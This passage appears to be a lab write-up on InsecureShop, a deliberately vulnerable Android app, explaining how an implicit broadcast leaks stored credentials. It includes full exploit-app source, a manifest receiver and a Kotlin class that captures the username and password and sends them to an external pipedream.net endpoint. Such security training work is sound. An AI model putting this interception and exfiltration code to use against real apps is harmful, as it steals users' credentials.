😛Vulnerability #9: Use of Implicit intent to send a broadcast with sensitive data

Reviewing the other methods defined in the AboutUs activity reveals another vulnerability regarding broadcasted intents:

    public final void onSendData(View view) {
        Intrinsics.checkParameterIsNotNull(view, "view");
        String userName = Prefs.INSTANCE.getUsername();
        if (userName == null) {
            Intrinsics.throwNpe();
        }
        String password = Prefs.INSTANCE.getPassword();
        if (password == null) {
            Intrinsics.throwNpe();
        }
        Intent intent = new Intent("com.insecureshop.action.BROADCAST");
        intent.putExtra("username", userName);
        intent.putExtra("password", password);
        sendBroadcast(intent);
        TextView textView = (TextView) _$_findCachedViewById(R.id.textView);
        Intrinsics.checkExpressionValueIsNotNull(textView, "textView");
        textView.setText("InsecureShop is an intentionally designed vulnerable android app built in Kotlin.");
    }

The important thing to note here is that the onSendData method uses an implicit intent in order to broadcast sensitive credentials. This is a weakness because mplicit broadcasts are delivered to each receiver registered on the device, across all apps.

Explicit vs. Implicit Intents

Let’s take a moment here to briefly discuss two types of intents:

1. Explicit Intents An explicit intent is one that you use to launch a specific app component, such as a particular activity or service in your app. Notice that the Intent()s being created specify which activity to open/use.

   
2. Implicit Intents An implicit intent specifies an action that can invoke any app on the device able to perform the action. Using an implicit intent is useful when your app cannot perform the action, but other apps probably can and you’d like the user to pick which app to use.

   

In the case of the onSendData method’s broadcast, the use of implicit intents to send credentials is dangerous since any app that has a registered broadcast receiver can intercept the intent being sent, therefore allowing attacker apps to retrieve valid credentials by simply listening for that specific intent broadcast.

Before we begin to develop the malicious apk, readers might be curious on how we could trigger the call to onSendData. When looking at the layout for the activity (activity_about_us.xml), we see that the onClick action for the Button is assigned to the vulnerable method. Thus, we simply need to click the button in the About Us activity to trigger the broadcast.

exploit.apk

To exploit the vuln, we’ll need to create our own malicious app and register a broadcast receiver that listens com.insecureshop.action.BROADCAST

AndroidManifest.xml

        <uses-permission android:name="android.permission.INTERNET"/>
        <receiver android:name=".InterceptBroadcast" android:exported="true">
            <intent-filter>
                <action android:name="com.insecureshop.action.BROADCAST"/>
            </intent-filter>
        </receiver>

MainActivity.kt

class MainActivity : AppCompatActivity() {
    override fun onCreate(savedInstanceState: Bundle?) {
        super.onCreate(savedInstanceState)
        setContentView(R.layout.activity_main)
        
        val interceptBroadcast = InterceptBroadcast()
        val filter = IntentFilter("com.insecureshop.action.BROADCAST")
        registerReceiver(interceptBroadcast, filter)
        Log.d("SHOPEXPLOIT", "receiver registered")
    }
}

InterceptBroadcast.kt

class InterceptBroadcast : BroadcastReceiver() {

    override fun onReceive(context: Context?, intent: Intent?) {

        // apparently, we can't run network connections on main thread
        // this is a very hacky way of bypassing the restriction
        // I should probably learn how to do it in AsyncTask after this
        val policy = StrictMode.ThreadPolicy.Builder().permitAll().build()
        StrictMode.setThreadPolicy(policy)

        // exfiltrate credentials to remote server
        val username = intent?.extras?.get("username")
        val password = intent?.extras?.get("password")
        val connection = URL("https://encn0rhq3ml1a.x.pipedream.net/?username=${username}&password=${password}").openConnection() as HttpsURLConnection
        connection.requestMethod = "GET"
        val data = connection.inputStream.bufferedReader().readText()
        connection.disconnect()

    }
}

All of the previous pocs that have been performed using adb could be performed using an exploit app as well. I use adb for a quick-and-easy demo of the exploit, on the other hand I create an exploit app to mirror how a malicious apk installed on a target device could carry out the attack.